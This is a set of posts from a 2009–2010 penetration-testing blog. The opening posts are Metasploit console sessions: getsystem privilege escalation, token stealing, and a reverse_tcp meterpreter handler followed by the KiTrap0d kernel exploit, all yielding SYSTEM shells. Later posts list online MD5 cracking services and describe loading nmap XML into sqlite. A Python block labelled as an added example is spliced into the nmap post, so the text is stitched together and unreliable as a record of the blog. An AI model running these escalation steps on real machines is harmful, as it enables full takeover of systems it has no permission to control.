Shiny new hotness...
meterpreter > getuid
Server username: WINXPSP3\user
**user is an admin; if you are not an admin you can only use -t 4, or -t 0, which iterates through all the techniques**
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t <technique>
    0 : All techniques available
    1 : Service - Named Pipe Impersonation (In Memory/Admin)
    2 : Service - Named Pipe Impersonation (Dropper/Admin)
    3 : Service - Token Duplication (In Memory/Admin)
    4 : Exploit - KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 2
...got system (via technique 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 3
...got system (via technique 3).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Hey, I want user back! Note that after technique 4 rev2self does not get you back to user (it only drops an impersonation token), so steal_token, in the next section, is the way to do it.
meterpreter > getsystem -t 4
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
steal_token
meterpreter > steal_token -h
[-] Usage: steal_token [pid]
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
660 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
832 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1000 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1048 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1088 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1440 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
540 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
980 wscntfy.exe x86 WINXPSP3\user C:\WINDOWS\system32\wscntfy.exe
1360 wuauclt.exe x86 WINXPSP3\user C:\WINDOWS\system32\wuauclt.exe
2004 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
2000 ctfmon.exe x86 WINXPSP3\user C:\WINDOWS\system32\ctfmon.exe
960 WINWORD.EXE x86 WINXPSP3\user C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe
meterpreter > steal_token 1560
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > shell    <-- shell now uses execute's -t (impersonated thread token) by default
Process 1272 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
WINXPSP3\user
C:\Documents and Settings\user>
Wait, I want a SYSTEM shell again!
meterpreter > drop_token
Relinquished token, now running as: WINXPSP3\user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 856 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
Or call execute without -t to use your process token:
meterpreter > execute -f cmd.exe -i -c -H
Process 676 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
carnal0wnage and Attack Research join forces!
The new home for the blog will be:
http://carnal0wnage.attackresearch.com/
Please point your RSS readers to the new location and enjoy.
With the new blog comes the ability for a few more people to post. If you want to contribute, please email c0arblog@attackresearch.com
-CG
Friday, January 29, 2010
metasploit getsystem command
Posted by CG at 1:24 PM
Labels: Metasploit
KiTrap0d now in metasploit
More for documentation and historical purposes than "new hotness".
Original advisory:
http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
"Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack"
Now implemented in Metasploit:
msf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler on port 443
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.100:443 -> 192.168.1.200:50777)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > sysinfo
Computer: WINXPSP3
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter > run ki
run killav run kitrap0d
meterpreter > run kitrap0d
[*] Currently running as WINXPSP3\user
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1128)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x29142 bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316
[?] OpenProcess(1316) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7cc, INFINITE);
[?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
**Nipple Rub...**
Posted by CG at 11:55 AM
Labels: Metasploit
Friday, January 22, 2010
Ruby, Nmap XML, and Databases
So I had a requirement to take some output from nmap scans, shove it into a database and then be able to run some queries on that data.
Wait, isn't there something that already does that?!
Actually, PBNJ and nmap_xml2sql.pl will do this, but they use (eeeek!) Perl to do it. I wanted to do it in Ruby.
Your options for Ruby & Nmap parsing are:
-rubynmap http://rubynmap.sourceforge.net/
-ruby-nmap http://ruby-nmap.rubyforge.org/
-metasploit has its own nmap xml parser
-writing your own
I started with rubynmap for my parsing gem.
(Note: use the svn version. The version number hasn't changed, but the svn version works a lot better.)
I stole the schema from nmap_xml2sql, added a few things plus a scripts table for nmap script output, and tried shoving that into a sqlite3 database:
CREATE TABLE nmap (
sid INTEGER PRIMARY KEY AUTOINCREMENT,
version TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER);
CREATE TABLE hosts (
sid INTEGER,
hid INTEGER PRIMARY KEY AUTOINCREMENT,
ip4 TEXT,
ip4num INTEGER,
hostname TEXT,
status TEXT,
tcpcount INTEGER,
udpcount INTEGER,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
upstr TEXT);
----SNIP----
This "works", but sqlite3 doesn't seem to actually support foreign keys. So while I was correctly assigning a SID value in nmap, that value wasn't linking up in hosts, and the same goes for the HID value in subsequent tables. If I'm wrong here, please let me know if this works for you as written. For me it populates with NULLs and I don't see how it's linking back to the tables.
cg@ihatesql:~$ sqlite3 nmap
SQLite version 3.6.21
sqlite> .dump nmap
CREATE TABLE nmap (
sid INTEGER PRIMARY KEY AUTOINCREMENT,
nmapversion TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER);
INSERT INTO "nmap" VALUES(1,'4.90RC1','1.03','nmap -A -oX test.xml 209.20.85.250','connect',1262181807,'Wed Dec 30 09:03:27 2009',1262181814,'Wed Dec 30 09:03:34 2009',1000);
COMMIT;
sqlite> .dump hosts
CREATE TABLE hosts (
sid INTEGER,
hid INTEGER PRIMARY KEY AUTOINCREMENT,
ip4num INTEGER,
hostname TEXT,
status TEXT,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
starttime INTEGER,
endtime INTEGER
);
INSERT INTO "hosts" VALUES(NULL,1,'209.20.85.250','209-20-85-250.slicehost.net','up','','','','','',1262181807,1262181814);
COMMIT;
So we can see that the SID and HID are correctly auto-incrementing, but the SID didn't make it into the hosts table (the first value in the hosts INSERT is NULL).
**Actually, sqlite3 as of 3.6.19 does support foreign keys, by adding
FOREIGN KEY(sid) REFERENCES nmap(sid) to the hosts table and so on, and by declaring PRAGMA foreign_keys = ON.
BUT I still couldn't get it to work.
Doing a db.execute("PRAGMA foreign_keys = ON") wasn't working for me. I received no errors, but doing a dump on the table would list the foreign key support as OFF :-( Maybe it's a gem issue?
So, to cheat, I added ip4num, ip6 and hostname to tables I knew I'd be querying a lot, like ports and scripts:
CREATE TABLE ports (
hid INTEGER,
ip4num INTEGER,
ip6 TEXT,
port INTEGER,
state TEXT,
reason TEXT,
name TEXT,
tunnel TEXT,
product TEXT,
version TEXT,
extra TEXT,
confidence INTEGER,
method TEXT,
proto TEXT,
owner TEXT,
rpcnum TEXT,
fingerprint TEXT,
FOREIGN KEY(hid) REFERENCES hosts(hid)
);
That way, querying for open ports or specific versions of a service was possible and I could still get an IP associated with the result. It's a bit harder to pull all that information together, but it's still there, and a select * from ports; or select ip4num from ports where port = 1521; would return quick results.
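Added example, not the post's code: the same import done in Python with the standard-library sqlite3 module (rather than the Ruby gem, so it runs with nothing installed), using a cut-down version of the post's schema. It shows the two points above in working form: PRAGMA foreign_keys = ON only takes effect on the connection that issues it, and NOT NULL on sid/hid stops unlinked rows being stored as NULL, with the port query going through the hid link instead of a copied ip column. The nmap XML, its host 192.0.2.10 and the trimmed column lists are constructed for the demo.

```python
import sqlite3
import xml.etree.ElementTree as ET

# Constructed sample of nmap -oX output (not a real scan): one host with two open ports.
NMAP_XML = """<nmaprun args="nmap -A -oX test.xml 192.0.2.10" start="1262181807" version="4.90RC1" xmloutputversion="1.03">
<host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/><hostnames><hostname name="example.test"/></hostnames>
<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="5.1p1"/></port>
<port protocol="tcp" portid="1521"><state state="open" reason="syn-ack"/><service name="oracle"/></port></ports></host></nmaprun>"""

# Cut-down version of the post's schema; sid/hid are NOT NULL so an unlinked row cannot slip in as NULL.
SCHEMA = """
CREATE TABLE nmap (sid INTEGER PRIMARY KEY AUTOINCREMENT, nmapversion TEXT, xmlversion TEXT, args TEXT, starttime INTEGER);
CREATE TABLE hosts (hid INTEGER PRIMARY KEY AUTOINCREMENT, sid INTEGER NOT NULL, ip4 TEXT, hostname TEXT, status TEXT, FOREIGN KEY(sid) REFERENCES nmap(sid));
CREATE TABLE ports (hid INTEGER NOT NULL, port INTEGER, proto TEXT, state TEXT, reason TEXT, name TEXT, product TEXT, version TEXT, FOREIGN KEY(hid) REFERENCES hosts(hid));
"""

def open_db(enforce_fk=True, path=":memory:"):
    db = sqlite3.connect(path)
    if enforce_fk:
        # Per connection and a no-op inside an open transaction: issue it on every fresh connection, before any DML.
        db.execute("PRAGMA foreign_keys = ON")
    db.executescript(SCHEMA)
    return db

def attr(elem, name):  # tolerate a missing <service>, <hostname>, etc.
    return elem.get(name) if elem is not None else None

def import_scan(db, xml_text):  # load one nmaprun into nmap/hosts/ports, return the scan's sid
    root = ET.fromstring(xml_text)
    cur = db.execute("INSERT INTO nmap (nmapversion, xmlversion, args, starttime) VALUES (?,?,?,?)",
                     (root.get("version"), root.get("xmloutputversion"), root.get("args"), int(root.get("start"))))
    sid = cur.lastrowid
    for host in root.findall("host"):
        cur = db.execute("INSERT INTO hosts (sid, ip4, hostname, status) VALUES (?,?,?,?)",
                         (sid, attr(host.find("address[@addrtype='ipv4']"), "addr"),
                          attr(host.find("hostnames/hostname"), "name"), attr(host.find("status"), "state")))
        hid = cur.lastrowid  # the link value that stayed NULL in the post's dump
        for p in host.findall("ports/port"):
            st, svc = p.find("state"), p.find("service")
            db.execute("INSERT INTO ports VALUES (?,?,?,?,?,?,?,?)",
                       (hid, int(p.get("portid")), p.get("protocol"), attr(st, "state"), attr(st, "reason"),
                        attr(svc, "name"), attr(svc, "product"), attr(svc, "version")))
    db.commit()
    return sid

def hosts_with_open_port(db, port):  # the post's "select ip4num from ports where port = X", via the hid link
    rows = db.execute("SELECT h.ip4 FROM ports p JOIN hosts h ON h.hid = p.hid WHERE p.port = ? AND p.state = 'open'", (port,))
    return [r[0] for r in rows]

def fk_enforced(db):  # True if this connection rejects a hosts row pointing at a scan that does not exist
    try:
        db.execute("INSERT INTO hosts (sid, ip4) VALUES (9999, '203.0.113.1')")
        return False
    except sqlite3.IntegrityError:
        return True
```

Opening the database with enforce_fk=False reproduces what the post saw: the orphan row is accepted silently.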
So code or it didn't happen...
nmap-parse takes an nmap xml file and spits out some of the results
http://carnal0wnage.attackresearch.com/sites/default/files/nmap-parse.txt
rubynmapsqlite3 takes an nmap XML file and an optional database name, creates or connects to the database, populates the tables if it needs to, parses the nmap XML and puts it into the appropriate tables.
http://carnal0wnage.attackresearch.com/sites/default/files/nmapsqlite3.txt
ruby-nmap-parse uses the ruby-nmap gem to parse nmap xml files
http://carnal0wnage.attackresearch.com/sites/default/files/ruby-nmap-parse.txt
caveats:
-my ruby coding sucks.
-my SQL coding sucks worse.
-code is released in "works for me" status
-send diffs not complaints :-) unless you go crazy with it, in which case just send me a link to your code
Next up: pushing that data into a postgres database instead of sqlite3.
Posted by CG at 9:45 AM
Monday, January 11, 2010
Various Online Password Crackers
Just a list of online (mostly) MD5 crackers, though some will do other hash types.
This post over on pcsec got me thinking about them.
http://www.pcsec.org/archives/MD5Seacrh-v18-by-mass.html
Of course not all of those are working, at least not for me.
So here is that list with links and a few others thanks to my twitter homies
passcracking.ru http://passcracking.ru/
md5crack http://md5crack.com/
md5decryption: http://md5decryption.com/
TheKaine.de: http://md5.thekaine.de/
AuthSecu: http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/decrypter-dechiffrer-cracker-hash-md5.php
hashcrack: http://hashcrack.com/index.php
insidepro: http://hash.insidepro.com/
md5decrypter: http://md5decrypter.com/
md5pass.info: http://md5pass.info/
Bonus points for two of the sites from the screen shot just giving you a parallels plesk login.
Sites specifically mentioned to me in no particular order
Plain-Text.info http://plain-text.info/add/ (also has IRC support)
Hashkiller: http://hashkiller.com/password/
Cryptohaze: http://www.cryptohaze.com/addhashes.php
md5rednoize: http://md5.rednoize.com/
milw0rm: http://milw0rm.com/cracker/insert.php
GData: http://gdataonline.com/seekhash.php
c0llision: http://www.c0llision.net/webcrack.php (also has IRC support)
PassCracking http://passcracking.com/
Lastly, for fun, a metasploit module that submits the hash to md5crack.com and displays the password if it's found.
msf auxiliary(md5check_md5crack) > run
[*] Sending 098f6bcd4621d373cade4e832627b4f6 hash to md5crack.com...
[*] plaintext md5 is: test
[*] Auxiliary module execution completed
link:
I started to do more than just md5crack, but writing regexes for different sites just seemed like a waste of time.
Posted by CG at 2:22 PM
Labels: password cracking
Sunday, December 27, 2009
2009 Blog Stats
Since everyone else is doing it...
Top 10 posts of the year 12/26/2008 - 12/26/2009 - blogspot
Adding your own exploits and modules in Metasploit
http://carnal0wnage.blogspot.com/2008/07/adding-your-own-exploits-in-metasploit.html
Gray Hat Python: Python Programming for Hackers and Reverse Engineers Book Review
http://carnal0wnage.blogspot.com/2009/05/gray-hat-python-python-programming-for.html
Dumping Memory to Extract Password Hashes
http://carnal0wnage.blogspot.com/2009/03/dumping-memory-to-extract-password.html
Using the Metasploit SMB Sniffer Module
http://carnal0wnage.blogspot.com/2009/04/using-metasploit-smb-sniffer-module.html
Metasploit and WMAP
http://carnal0wnage.blogspot.com/2008/11/metasploit-and-wmap_24.html
Metasploit + Karma=Karmetasploit Part 1
http://carnal0wnage.blogspot.com/2008/08/playing-with-karmasploit-part-1.html
Token Passing with Incognito
http://carnal0wnage.blogspot.com/2008/05/token-passing-with-incognito.html
Metasploit + Karma=Karmetasploit Part 2
http://carnal0wnage.blogspot.com/2008/08/metasploit-karmakarmasploit-part-2.html
Getting your smartcard to work with Ubuntu
http://carnal0wnage.blogspot.com/2008/11/getting-your-smartcard-to-work-with.html
msvctl -- pass the hash action
http://carnal0wnage.blogspot.com/2008/03/msvctl-pass-hash-action.html
Top 10 posts of the year 12/26/2008 - 12/26/2009 - AttackResearch
Release of the TOR Backdoor
http://carnal0wnage.attackresearch.com/node/376
Coming soon to a pentest near you... (assagi teaser)
http://carnal0wnage.attackresearch.com/node/366
Microsoft DirectShow MPEG2TuneRequest Stack Overflow P0C
http://carnal0wnage.attackresearch.com/node/370
Why I hate web app pentesting...
http://carnal0wnage.attackresearch.com/node/383
PDF Defiling Intro
http://carnal0wnage.attackresearch.com/node/362
Past, Present, and Future of Security and the Security Community
http://carnal0wnage.attackresearch.com/node/395
Failing the Test of Trust (guest post By Timelord)
http://carnal0wnage.attackresearch.com/node/386
More On Metasploit Meterpreter & Timestomp
http://carnal0wnage.attackresearch.com/node/390
Security Conferences, pen tests and incident response
http://carnal0wnage.attackresearch.com/node/361
Metasploit JSP Shells
http://carnal0wnage.attackresearch.com/node/389
Top 10 Keywords that brought people to the blog - blogspot
carnal0wnage
gsecdump
karmetasploit
carnal ownage
msvctl
metasploit oracle
metasploit
carnalownage
scapy
c:\windows\system32\2.exe
Top 10 Keywords that brought people to the blog - AttackResearch
metasploit oracle
client-side penetration testing notacon edition slides
node/24
carnal0wnage
ping sweep
tor backdoor
attack research
msvctl
phishing framework
maltego download
Top 10 Referring Sites - blogspot
ethicalhacker.net
metasploit.com
google.com
twitter.com
forums.remote-exploit.org
blogger.com
learnsecurityonline.com
carnal0wnage.com
penetrationtests.com
synjunkie.blogspot.com
Top 10 Referring Sites - AttackResearch
carnal0wnage.blogspot.com
ethicalhacker.net
blog.attackresearch.com
google.com
twitter.com
blog.metasploit.com
attackresearch.com
pentoo.ch
learnsecurityonline.com
pauldotcom.com
Top 10 Countries - blogspot
United States
United Kingdom
France
Germany
India
Canada
Italy
Spain
Australia
Brazil
Top 10 Countries - AttackResearch
United States
United Kingdom
France
India
Canada
Germany
Indonesia
Spain
Italy
Australia
Posted by CG at 5:53 PM
Friday, December 18, 2009
Beating Up On Oracle Book List
Need some last-minute books to beat up on Oracle? Here's a list.
(You'll have to go to the Rampant Press site: http://www.rampant-books.com/book_0701_oracle_forensics.htm)
Posted by CG at 9:39 AM
Labels: book lists
Friday, December 11, 2009
Hackers -- Net Cafe Series Video circa 1996
From the old skool files...
This is the very first episode of the Net Cafe series. It was shot on location at a cybercafe in San Francisco called CoffeeNet. It looks at the hacker culture and its influence on the early growth of the internet. Guests include Dan Farmer, author of SATAN and COPS; Elias Levy (aka Aleph One), webmaster of underground.org and Bugtraq; and "Reid Fleming" and "White Knight" from Cult of the Dead Cow. Originally broadcast in 1996.
Posted by CG at 3:05 PM
